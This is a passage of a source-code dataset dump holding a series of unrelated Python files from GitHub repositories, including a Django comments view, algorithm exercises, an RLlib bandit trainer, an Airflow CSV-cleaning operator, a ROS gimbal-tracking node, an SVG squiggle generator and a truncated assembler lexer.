self.serializer_class(data=request.data)\n if seralizer.is_valid():\n seralizer.save()\n return Response(seralizer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(seralizer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, *args, **kwargs):\n # url /comments/update/comment_id\n print(\"comments/update\")\n comment_id = self.request.resolver_match.kwargs['comment_id']\n instance = get_object_or_404(Comment, id=comment_id)\n serializer = self.serializer_class(instance, data=request.data)\n if self.authorization():\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n def destroy(self, request, *args, **kwargs):\n comment_id = self.request.resolver_match.kwargs['comment_id']\n instance = get_object_or_404(Comment, id=comment_id)\n\n if self.authorization(request, instance):\n instance.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n else:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n","repo_name":"Mitso98/django_labs","sub_path":"lab3/blog/blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241684775","text":"# 以数组 intervals 表示若干个区间的集合,其中单个区间为 intervals[i] = [starti, endi] 。\n# 请你合并所有重叠的区间,并返回 一个不重叠的区间数组,该数组需恰好覆盖输入中的所有区间 。\n#\n\nintervals = [[1,3],[2,6],[8,10],[15,18]]\nintervals = [[1,4],[4,5]]\nintervals = [[1,4],[2,3]]\n\n# 排序,从小到大合并。每次只和res数组中的最后一个比较交叉程度即可。\n# 重点是先排序\ndef merge(intervals):\n intervals = sorted(intervals)\n res = [intervals[0]]\n\n for interval in intervals[1:]:\n if interval[0] <= res[-1][1]:\n res[-1] = [min(res[-1][0], interval[0]), max(res[-1][1], interval[1])]\n else:\n res.append(interval)\n return res\n\nprint(merge(intervals))","repo_name":"vandeppce/algorithm","sub_path":"9.greedy/56Merge.py","file_name":"56Merge.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70672228329","text":"class Book:\n def __init__(self, author, title, shops=None):\n self.author = author\n self.title = title\n\n self.shops = shops\n self.shop = None\n\n def get_prices(self):\n for shop_object in self.shops:\n shop_object.get_price()\n if self.shop is None or shop_object.price < self.shop.price:\n self.shop = shop_object\n","repo_name":"linnit/gr_watcher","sub_path":"gr_watcher/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31646554738","text":"import sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\n\nn_bit = 2**n\n\n# 1の立つ数で仕分けしておく\nflag_num = {}\nlog2_num = {}\nfor i in range(n+1):\n flag_num[i] = []\n log2_num[2**i] = i\n\nfor i in range(n_bit):\n num = str(bin(i)).count('1')\n flag_num[num].append(i)\n\n#bit演算\n# https://www.slideshare.net/KMC_JP/slide-www\n\n# いくつかのウサギを同じグループにした時の点数を計算しておく\ng = [0]*n_bit\nfor i in range(2,n+1):\n for j in flag_num[i]:\n #1になっている一番下の桁の取得\n left_flag = j & (-j)\n #一番左の1だけ反転\n right_flags = j - left_flag\n\n g[j] = g[right_flags]\n left = log2_num[left_flag]\n for k in range(n+1):\n if( ((right_flags >> k) & 1) > 0):\n g[j] += a[left][k]\n\n#dpを更新する\ninit = -1 * 150 * 10**10\ndp = [init] * n_bit\ndp[0] = 0\nfor i in range(1,n+1):\n for j in flag_num[i]:\n temp = init\n k = (j-1) & j\n while( k >= 0):\n ### ここに処理を描く ###\n temp = max(temp, dp[k] + g[j-k] )\n\n # k==0ならbreak\n if(k==0):\n break\n #kの更新\n k = (k-1) & j\n dp[j] = temp\n\nprint(dp[n_bit - 1])\n","repo_name":"komajun365/competitive_programming","sub_path":"others/dpcon/u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29678948814","text":"def interpolation_search(arr, target):\n \"\"\"\n Perform interpolation search to find the target element in a sorted array.\n\n Args:\n arr (list): The sorted list to search in.\n target (int): The element to search for.\n\n Returns:\n int: The index of the target element in the array, or -1 if not found.\n \"\"\"\n left, right = 0, len(arr) - 1\n\n while left <= right and arr[left] <= target <= arr[right]:\n if left == right:\n if arr[left] == target:\n return left\n return -1\n pos = left + ((target - arr[left]) * (right - left) // (arr[right] - arr[left]))\n\n if arr[pos] == target:\n return pos\n if arr[pos] < target:\n left = pos + 1\n else:\n right = pos - 1\n\n return -1\n\nif __name__ == \"__main__\":\n \n # Test case\n test_array = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]\n target_element = 11\n result = interpolation_search(test_array, target_element)\n\n if result == -1:\n print(f\"Element {target_element} is not present in the array\")\n else:\n print(f\"Element {target_element} found at position {result} in the array\")\n","repo_name":"N0vice17/DSA-with-Java","sub_path":"Searching_Algorithm/PYTHON/interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"69742261","text":"import time\ndef gcd_rec(a, b):\n\tmaxv = max(a, b)\n\tminv = min(a, b)\n\tremainder = maxv % minv\n\tif remainder == 0:\n\t\treturn minv\n\telse:\n\t\treturn gcd_rec(minv, remainder)\ndef gcd_cycle(a, b):\n\tmaxv = max(a, b)\n\tminv = min(a, b)\n\tgcd = maxv\n\twhile minv != 0:\n\t\tmaxv = minv\n\t\tminv = gcd % minv\n\t\tgcd = maxv\n\treturn maxv\nst1 = time.time()\nnum = gcd_rec(100, 54)\nstop1 = time.time()\nprint(\"time spent = \" + str((stop1 - st1) * 1000000) + \" num = \" + str(num))\nst2 = time.time()\nnum2 = gcd_cycle(100, 54)\nstop2 = time.time()\nprint(\"time spent = \" + str((stop2 - st2) * 1000000) + \" num = \" + str(num2))","repo_name":"Stepanvar/clean_prog","sub_path":"py/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14619850106","text":"#!/usr/bin/python3\nimport json\nimport sys\nimport sqlite3\nimport os\ndate_path = \"/home/user/Документы/homework/HW/dict.db\"\n\n\n\ndef create_db(date_path):\n if not os.path.isfile(date_path):\n with open(date_path,\"wb\") as file:\n pass\n return\n\ndef get_connect(date_path):\n connect = sqlite3.connect(date_path)\n return connect\n\ndef create_table(connect):\n sql_dict = \"\"\"CREATE TABLE IF NOT EXISTS\"dictionary\"(\n \"id\" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n \"word\" TEXT NOT NULL,\n \"lang_out\" TEXT NOT NULL,\n \"lang_in\" TEXT NOT NULL,\n \"translation\" TEXT,\n \"meaning\" TEXT\n );\"\"\"\n cursor = connect.cursor()\n cursor.execute(sql_dict)\n connection.commit()\n\ndef send_date(element, connect):\n #print()\n sql = f\"\"\"INSERT INTO \"dictionary\"(\n \"id\",\n \"word\",\n \"lang_out\",\n \"lang_in\",\n \"translation\",\n \"meaning\"\n )\n VALUES(\n \"{element['word']}\",\n \"{element['lang_out']}\",\n \"{element['lang_in']}\"\n \"{element['translation']}\"\n \"{element['meaning']}\"\n );\"\"\"\n cursor=connect.cursor()\n cursor.execute(sql)\n connection.commit()\n\nif __name__ == \"__main__\":\n path = \"/home/user/Документы/homework/HW/dict.db\"\n create_db(date_path)\n connection = get_connect(date_path)\n create_table(connection)\n element =({'word':'вечер','lang_out':'ru','lang_in':'en','translation':'evening',\n 'meaning':'вечеринка'})\n connect=get_connect(date_path)\n send_date(element,connect)\n","repo_name":"bogdanyy/homework","sub_path":"dict_db.py","file_name":"dict_db.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18141129935","text":"#!/usr/bin/env python3\n\nimport math\nfrom collections import deque\nfrom fractions import Fraction\n\nimport primesieve\n\n\nLIMIT = 80\nUSABLE = [True] * (LIMIT + 1)\n\n\ndef find_prime_factor_combos(p):\n print(f\"considering prime factor {p}...\")\n potential = [n for n in range(p, LIMIT + 1, p) if USABLE[n]]\n k = len(potential)\n combos = []\n current_sum = Fraction(0)\n arr = [0] * k\n for _ in range(2 ** k - 1):\n i = 0\n while arr[i] == 1:\n arr[i] = 0\n current_sum -= Fraction(1, potential[i] ** 2)\n i += 1\n arr[i] = 1\n current_sum += Fraction(1, potential[i] ** 2)\n if current_sum.denominator % p != 0 and current_sum <= 1 / 2:\n combo = tuple(potential[i] for i in range(k) if arr[i])\n combos.append(combo)\n combos = sorted(combos)\n rejected = set(potential).difference(*combos)\n for n in rejected:\n USABLE[n] = False\n if combos:\n print(f\"found {len(combos)} combos\")\n # for combo in combos:\n # print(combo)\n return [set(combo) for combo in combos]\n\n\ndef find_fat_combos(single_factor_combos):\n print(\"checking compatibility...\")\n # A FIFO queue for BFS. Each element is of the form\n #\n # (depth, combo, forbidden): (int, set, set)\n #\n # where depth is the next index in single_factor_combos to look,\n # combo is the current fat combo, and forbidden is the known set of\n # numbers forbidden by the combo.\n queue = deque()\n queue.append((0, set(), set()))\n maxdepth = len(single_factor_combos)\n while queue and queue[0][0] < maxdepth:\n depth, combo, forbidden = queue.popleft()\n p, p_combos = single_factor_combos[depth]\n existing_p_multiples = set(n for n in combo if n % p == 0)\n for p_combo in p_combos:\n if existing_p_multiples <= p_combo and not (p_combo & forbidden):\n new_combo = combo.copy()\n new_forbidden = forbidden.copy()\n new_combo |= p_combo\n new_forbidden |= set(range(p, LIMIT + 1, p)) - p_combo\n queue.append((depth + 1, new_combo, new_forbidden))\n fat_combos = [combo for _, combo, _ in queue]\n print(f\"found {len(fat_combos)} fat combos\")\n # for fat_combo in sorted(tuple(sorted(combo)) for combo in fat_combos):\n # print(fat_combo)\n return fat_combos\n\n\ndef find_result_combos(fat_combos):\n print(\"searching for results...\")\n choices = []\n n = 2\n while n <= LIMIT:\n choices.append((n, Fraction(1, n * n)))\n n *= 2\n results = []\n for combo in fat_combos:\n inverse_square_sum = sum(Fraction(1, n * n) for n in combo)\n remaining = Fraction(1, 2) - inverse_square_sum\n for n, contrib in choices:\n if remaining == contrib:\n combo.add(n)\n results.append(combo)\n break\n if remaining < contrib:\n continue\n combo.add(n)\n remaining -= contrib\n results = sorted(tuple(sorted(combo)) for combo in results)\n for result in results:\n print(result)\n print(f\"found {len(results)} results\")\n\n\ndef main():\n primes = primesieve.primes(3, LIMIT)\n single_factor_combos = []\n for p in reversed(primes):\n combos = find_prime_factor_combos(p)\n if combos:\n single_factor_combos.insert(0, (p, [set()] + combos))\n fat_combos = find_fat_combos(single_factor_combos)\n find_result_combos(fat_combos)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"152/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24852895140","text":"import logging\nfrom typing import Type\n\nfrom ray.rllib.agents.bandit.bandit_torch_policy import BanditTorchPolicy\nfrom ray.rllib.agents.trainer import Trainer, with_common_config\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.typing import TrainerConfigDict\n\nlogger = logging.getLogger(__name__)\n\n# fmt: off\n# __sphinx_doc_begin__\nDEFAULT_CONFIG = with_common_config({\n # No remote workers by default.\n \"num_workers\": 0,\n \"framework\": \"torch\", # Only PyTorch supported so far.\n\n # Do online learning one step at a time.\n \"rollout_fragment_length\": 1,\n \"train_batch_size\": 1,\n\n # Bandits cant afford to do one timestep per iteration as it is extremely\n # slow because of metrics collection overhead. This setting means that the\n # agent will be trained for 100 times in one iteration of Rllib\n \"timesteps_per_iteration\": 100,\n})\n# __sphinx_doc_end__\n# fmt: on\n\n\nclass BanditLinTSTrainer(Trainer):\n \"\"\"Bandit Trainer using ThompsonSampling exploration.\"\"\"\n\n @classmethod\n @override(Trainer)\n def get_default_config(cls) -> TrainerConfigDict:\n config = Trainer.merge_trainer_configs(\n DEFAULT_CONFIG,\n {\n # Use ThompsonSampling exploration.\n \"exploration_config\": {\"type\": \"ThompsonSampling\"}\n },\n )\n return config\n\n @override(Trainer)\n def get_default_policy_class(self, config: TrainerConfigDict) -> Type[Policy]:\n return BanditTorchPolicy\n\n\nclass BanditLinUCBTrainer(Trainer):\n @classmethod\n @override(Trainer)\n def get_default_config(cls) -> TrainerConfigDict:\n return Trainer.merge_trainer_configs(\n DEFAULT_CONFIG,\n {\n # Use UpperConfidenceBound exploration.\n \"exploration_config\": {\"type\": \"UpperConfidenceBound\"}\n },\n )\n\n @override(Trainer)\n def get_default_policy_class(self, config: TrainerConfigDict) -> Type[Policy]:\n return BanditTorchPolicy\n","repo_name":"santosh-shetkar-katonic/ray-cluster","sub_path":"rllib/agents/bandit/bandit.py","file_name":"bandit.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1503727524","text":"import random\r\ndef game():\r\n print(\"Now,Choose a color from the above list:\")\r\n choosen=input()\r\n if choosen not in color:\r\n print(\"You have not choosed from the above list\")\r\n game()\r\n else:\r\n pass\r\n random_choice=(random.choice(color))\r\n print(random_choice)\r\n if random_choice==choosen:\r\n print(\"Hurray! You Won the Game\")\r\n exit()\r\n else:\r\n print(\"Ohh Noo..You failed to guess...!\")\r\ncolor=['Violet','Indigo','Blue','Green','Yellow','Orange','Red']\r\nprint(color)\r\ngame()\r\nprint(\"You have two more Chances to guess..\")\r\ngame()\r\nprint(\"You have one more Chance to guess..\")\r\ngame()\r\nprint(\"You lost the Game\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"manjula-s-13/Guessing-Game","sub_path":"Guessing game project.py","file_name":"Guessing game project.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12388817798","text":"import os\n\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport pandas as pd\n\nclass PandasCleanCsvOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n source_directory_path=\"\",\n destination_directory_path=\"\",\n data_definition = None,\n delimiter=',',\n *args, **kwargs):\n \"\"\" \n Process CSV files with Pandas\n Parameters:\n source_directory_path: \"String\"\n destination_directory_path: \"String\"\n data_definition: \"Dictionary\"\n delimiter: \"String\"\n \n \"\"\"\n\n super(PandasCleanCsvOperator, self).__init__(*args, **kwargs)\n self.source_directory_path = source_directory_path\n self.destination_directory_path = destination_directory_path\n self.delimiter = delimiter\n self.data_definition = data_definition\n\n def execute(self, context):\n action = f\"Read and Clean CSV {self.source_directory_path} to {self.destination_directory_path}\"\n self.log.info(f\"Start {action}\")\n\n dest_directory = self.destination_directory_path\n\n for root, dirs, files in os.walk(self.source_directory_path):\n\n for f in files:\n file_path = os.path.join(root,f)\n df = pd.read_csv(file_path, self.delimiter)\n\n if(self.data_definition):\n if(self.data_definition[\"columns\"]):\n df = df[self.data_definition[\"columns\"]]\n if(self.data_definition[\"rename\"]):\n df = df.rename(columns=self.data_definition[\"rename\"])\n if(self.data_definition[\"replace_na\"]):\n df = df.fillna(value = self.data_definition[\"replace_na\"])\n if(self.data_definition[\"convert\"]):\n df = df.astype(self.data_definition[\"convert\"])\n \n cleaned_file = os.path.join(dest_directory,f)\n df.to_csv(cleaned_file, index = False)\n self.log.info(f\"Saved {dest_directory}\")\n\n self.log.info(f\"End {action}\")\n ","repo_name":"joelatiam/UsDemographyImigrationPipeline","sub_path":"plugins/operators/clean_csv_with_panda.py","file_name":"clean_csv_with_panda.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39512975539","text":"from posthog.constants import FunnelOrderType\nfrom posthog.models.filters import Filter\nfrom posthog.queries.funnels import (\n ClickhouseFunnel,\n ClickhouseFunnelStrict,\n ClickhouseFunnelUnordered,\n)\nfrom posthog.queries.funnels.utils import get_funnel_order_class\nfrom posthog.test.base import BaseTest\n\n\nclass TestGetFunnelOrderClass(BaseTest):\n def test_filter_missing_order(self):\n filter = Filter({\"foo\": \"bar\"})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnel)\n\n def test_unordered(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.UNORDERED})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnelUnordered)\n\n def test_strict(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.STRICT})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnelStrict)\n\n def test_ordered(self):\n filter = Filter({\"funnel_order_type\": FunnelOrderType.ORDERED})\n self.assertEqual(get_funnel_order_class(filter), ClickhouseFunnel)\n","repo_name":"PostHog/posthog","sub_path":"posthog/queries/funnels/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"44555103425","text":"# importing the module\nimport doctest\n\ndef id_to_seat(id_s):\n \"\"\"\n >>> id_to_seat(\"BFFFBBFRRR\")\n BFFFBBFRRR: row 70, column 7, seat ID 567.\n >>> id_to_seat(\"FFFBBBFRRR\")\n FFFBBBFRRR: row 14, column 7, seat ID 119.\n >>> id_to_seat(\"BBFFBBFRLL\")\n BBFFBBFRLL: row 102, column 4, seat ID 820.\n \"\"\"\n id=0\n\n row=0\n exp=64\n for let in id_s[0:7]:\n if let == \"F\":\n row+=0\n elif let == \"B\":\n row+=exp\n exp/=2\n\n col=0\n exp=4\n for let in id_s[7:]:\n if let == \"L\":\n col+=0\n elif let == \"R\":\n col+=exp\n exp/=2\n\n\n # for letter in id[5:7]:\n\n id=row*8 + col\n print(f\"{id}: row {int(row)}, column {int(col)}, seat ID {id}.\")\n return id\n\n\n# invoking the testmod function\ndoctest.testmod(name='id_to_seat', verbose=True)\n\ndef main():\n print(\"ok\")\n f=open(\"input\", \"r\")\n lines=f.readlines()\n\n seats=list(range(1000))\n m=0\n for l in lines:\n x=id_to_seat(l)\n if x > m:\n m=x\n seats.remove(x)\n\n print(seats)\n\nmain()","repo_name":"simonvbrae/advent-of-code-2020","sub_path":"day5/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72241216167","text":"import cgi\r\nfrom django.shortcuts import render\r\nfrom .models import Category\r\n# Create your views here.\r\ndef post(request):\r\n if request.method == \"GET\" :\r\n my_category = Category.objects.all()\r\n return render(request, 'category.html', {'category':my_category})\r\n elif request.method == 'POST':\r\n title = request.POST.get('my-title','')\r\n content = request.POST.get('my-content','')\r\n\r\n cg = Category()\r\n cg.title = title\r\n cg.content = content\r\n cg.save()\r\n\r\n return render(request, 'category.html')\r\n","repo_name":"khw7876/timeattacks","sub_path":"Django/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11163461034","text":"import sys\nINF = sys.maxsize\ninput = lambda:sys.stdin.readline().strip()\n\n\n\n'''\n1234 100\n456\n'''\nm = int(input())\nremain = list(map(int, input().split()))\nn = int(input())\nmake = list(map(int, input().split()))\n\nremain.sort()\nmake.sort()\nmade = [0 for i in range(n)] #만든 파이프\ndef making(cur, val, goal):\n if cur==n:\n if val==0:\n return INF\n else:\n return val\n if made[cur] == 1:\n return making(cur+1, val)\n if goal==make[cur]:\n made[cur] = 1\n return val+1\n elif goal<make[cur]:\n return making(cur+1, val)\n else:\n return\n\n\n\nfor i in range(m):\n for j in range(n):\n ret += func(j,0,remain[i])\n","repo_name":"as950118/Algorithm","sub_path":"python/Backtracking/2409.py","file_name":"2409.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74638327527","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import MountControl\nfrom mavros_msgs.srv import MountConfigure\nfrom gazebo_msgs.srv import GetLinkState\nimport sys\nimport std_msgs.msg\n\nfrom robocup.msg import goal_distance\n\n\ngimbal_pitch_ = -45 #-15 #-60\ngimbal_yaw_ = 0 #0.0\ngimbal_roll_ = 0.0\n\n\n\ndef xy_callback(xy_msg):\n print(\"gimbal tracking\")\n global gimbal_pitch_,gimbal_roll_,gimbal_yaw_,msg\n width_err=xy_msg.x_image_frame-320\n height_err=240-xy_msg.y_image_frame\n print(width_err)\n if abs(width_err)>100:\n gimbal_yaw_=gimbal_yaw_+0.01*width_err\n if abs(height_err)>100:\n gimbal_pitch_=gimbal_pitch_+0.01*height_err\n print(gimbal_pitch_)\n \n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = \"map\"\n msg.mode = 2\n msg.pitch = gimbal_pitch_\n msg.roll = gimbal_roll_\n msg.yaw = gimbal_yaw_\n mountCnt.publish(msg)\n\n rate.sleep()\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n \n rospy.init_node('gimbal_track')\n\n\n\n xy_sub=rospy.Subscriber(\"max_goal_distance\",goal_distance,xy_callback,queue_size=1)\n drone_name=rospy.get_param(\"~drone_name\")\n drone_id= str(rospy.get_param(\"~drone_id\"))\n\n vehicle_type =drone_name\n vehicle_id = drone_id\n\n mountCnt = rospy.Publisher('mavros/mount_control/command', MountControl, queue_size=1)\n \n rate=rospy.Rate(50)\n \n\n cam_pose_pub = rospy.Publisher('cam_pose', PoseStamped, queue_size=1)\n cam_pose = PoseStamped()\n\n\n print(vehicle_type+'_'+vehicle_id+': Gimbal control')\n # while not rospy.is_shutdown():\n msg = MountControl()\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = \"map\"\n msg.mode = 2\n msg.pitch = gimbal_pitch_\n msg.roll = gimbal_roll_\n msg.yaw = gimbal_yaw_\n mountCnt.publish(msg)\n rospy.spin()\n","repo_name":"hello50505/robocup_zzu","sub_path":"src/robocup/src/gimbal_track.py","file_name":"gimbal_track.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73543035688","text":"# TODO: say where this algorithm came from\n\nfrom __future__ import division, print_function\nimport numpy as np\nfrom PIL import Image\nfrom svgpathtools import *\nimport svgpathtools\nfrom svgpathtools.path import polyline\nfrom svgwrite.mixins import ViewBox\nfrom . import Generator\n\nCLOSED_WARNING_ON=False # suppress svgpathtools warning\n\nDEF_COLOR=\"#000000\"\n\nDEF_FREQUENCY = 192\nMIN_FREQUENCY = 5\nMAX_FREQUENCY = 256\n\nDEF_LINE_COUNT = 70\nMIN_LINE_COUNT = 10\nMAX_LINE_COUNT = 200\n\nDEF_AMPLITUDE = 2.0\nMIN_AMPLITUDE = 0.1\nMAX_AMPLITUDE = 5.0\n\nDEF_SPACING = 1.5\nMIN_SPACING = 0.5\nMAX_SPACING = 2.9\n\nDEF_HORIZONTAL_PHASE_SHIFT = 0\nDEF_VERTICAL_PHASE_SHIFT = 0\n\nMIN_POINTS = 5\nBRIGHTNESS_THRESHOLD = 250\n\nclass Squiggle(Generator):\n def __init__(self, img=None, input_path=None, frequency=DEF_FREQUENCY, line_count=DEF_LINE_COUNT, amplitude=DEF_AMPLITUDE, spacing=DEF_SPACING): # TODO: use kwargs\n super().__init__(img, input_path)\n\n self.frequency = frequency\n self.line_count = line_count\n self.amplitude = amplitude\n self.spacing = spacing\n\n def setFrequency(self, frequency):\n self.frequency = np.clip(frequency, MIN_FREQUENCY, MAX_FREQUENCY)\n return self.frequency\n\n def setLineCount(self, line_count):\n self.line_count = np.clip(line_count, MIN_LINE_COUNT, MAX_LINE_COUNT)\n return self.line_count\n\n def setAmplitude(self, amplitude):\n self.amplitude = np.clip(amplitude, MIN_AMPLITUDE, MAX_AMPLITUDE)\n return self.amplitude\n\n def setSpacing(self, spacing):\n self.spacing = np.clip(spacing, MIN_SPACING, MAX_SPACING)\n return self.spacing\n\n def generate(self, color=DEF_COLOR, x_offset=DEF_HORIZONTAL_PHASE_SHIFT, y_offset=DEF_VERTICAL_PHASE_SHIFT, smooth=False, continuous=False):\n squiggles = []\n\n for y in range(0, self.img.height, self.img.height // self.line_count): # self.img.height // self.line_count\n y = (y + y_offset) % self.img.height\n a = 0\n current_line = [] # store bits of the line\n if continuous:\n current_line.append(complex(0, y)) # start the line\n\n for x in np.arange(self.spacing, self.img.width, self.spacing):\n v = np.mean(self.img.getpixel((x, y))) # TODO: downsample image and average chunk!!\n\n #r = (255 - v) / self.line_count * self.amplitude\n r = self.amplitude * (255 - v) / self.line_count\n a += (255 - v) / self.frequency\n\n point = complex(x, y + np.sin(a + x_offset)*r)\n\n if continuous:\n current_line.append(point)\n else:\n if (v < BRIGHTNESS_THRESHOLD or (len(current_line) > 0 and len(current_line) < MIN_POINTS)): # TODO: calculate this with greyscale mask\n current_line.append(point)\n else:\n squiggles.extend(polyline(*current_line))\n current_line = []\n\n current_line_path = polyline(*current_line)\n if smooth and continuous: # TODO: fix smoothing on discontinuous paths\n current_line_path = smoothed_path(current_line_path)\n squiggles.extend(current_line_path)\n\n paths = Path(*squiggles).continuous_subpaths()\n #wsvg(paths, filename=self.output_path, colors=([color]*len(paths)))\n\n #return self.output_path\n return paths\n\nif __name__ == \"__main__\":\n gen = Squiggle()","repo_name":"RobethX/bmplotter","sub_path":"bmplotter/generators/Squiggle.py","file_name":"Squiggle.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30102825614","text":"#! /usr/bin/python3\n\nimport ply.lex as lex\nimport math\n\n# once the lexer reaches a DATA token, data is set to True, and \n# subsequent IMM tokens are parsed as data, not immediates.\ntokens = (\n\t'COMMA',\n\t'REG',\n\t'RTYPE',\n\t'ITYPE',\n\t'SHIFT',\n\t'SCOND',\n\t'BCOND',\n\t'JCOND',\n\t'NOT',\n\t'NEG',\n\t'PUSH',\n\t'POP',\n\t'JAL',\n\t'CALL',\n\t'NOP',\n\t'MOVWI',\n\t'FRAME',\n\t'LEAVE',\n\t'IMM',\n\t'LABEL',\n\t'LABEL_DEF',\n\t'COMMENT',\n\t'TEXT',\n\t'DATA',\n\t'STRING'\n\t)\n\ndef t_COMMENT(t):\n\tr'\\#.*'\n\tpass\n\nt_REG = r'\\$(?:1[0-5]|[0-9]|t[0-3]|s[0-3]|a[0-2]|v[0-1]|sp|fp|ra)'\nt_COMMA = r'\\,'\n\n# 2 operation pseudo instructions, increase instruction count by 2.\ndef t_MOVWI(t):\n\t'movwi'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_NEG(t):\n\t'neg'\n\tt.lexer.instr_count += 2\n\treturn t\n\ndef t_PUSH(t):\n\t'push'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_POP(t):\n\t'pop'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_LEAVE(t):\n\t'leave'\n\tt.lexer.instr_count += 3\n\treturn t\n\t\ndef t_FRAME(t):\n\t'frame'\n\tt.lexer.instr_count += 3\n\treturn t\n\t\n# call expands into push, movwi, jal, pop\ndef t_CALL(t):\n\t'call'\n\tt.lexer.instr_count += 7\n\treturn t\n\n# instructions\ndef t_SHIFT(t):\n\tr'lshi|ashui'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_ITYPE(t):\n\tr'andi|ori|xori|addi|addui|addci|subi|subci|cmpi|movi|muli|lui'\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_RTYPE(t):\n\tr\"and|or|xor|add|addu|addc|sub|subc|cmp|mov|mul|test|lsh|ashu|load|stor\"\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_SCOND(t):\n\tr's(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\tt.value = t.value[1:]\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_BCOND(t):\n\tr'b(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\t# branch needs to know it's memory location to calculate relative jumps.\n\tt.value = (t.value[1:], t.lexer.instr_count)\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_JCOND(t):\n\tr'j(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\tt.value = t.value[1:]\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_NOT(t):\n\t'not'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_NOP(t):\n\t'nop'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_JAL(t):\n\t'jal'\n\tt.lexer.instr_count += 1\n\treturn t\n\n# Immediate\ndef t_IMM(t):\n\tr'(?:-?0[xX][a-fA-F0-9]+)|(?:-?[0-9]+)|(?:0[bB][01]+)'\n\tif 